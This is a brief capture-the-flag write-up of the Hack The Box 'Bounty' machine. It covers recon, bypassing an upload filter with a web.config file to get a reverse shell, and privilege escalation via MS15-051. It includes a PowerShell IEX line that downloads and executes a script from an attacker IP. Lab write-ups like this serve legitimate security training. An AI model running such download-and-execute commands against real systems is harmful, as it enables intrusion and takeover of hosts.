Hack The Box :: Bounty
Published in
Oct 16, 2020
HTTP Upload File Restriction | UnPatched OS
Run nmap and then gobuster to discover the transfer.aspx webpage
Looks like png and jpeg are allowed but when trying .aspx extension its blocked.
To find out which extensions are allowed get all the extensions from microsoft.com
Automate the submission of all the extensions using burp.
So .config is allowed.
Searching these keywords in google gives us a vulnerability.
Lets try to get a reverse shell using this wen.config vulnerability.
And we get shell.
To recon and find priv escalation lets use sherlock.
<IEX (New-Object Net.WebClient).downloadString(‘http://10.10.14.14/priv.ps1’)
I am using pre-compiled binary for MS15–051 (not recommended though)
And we have admin !
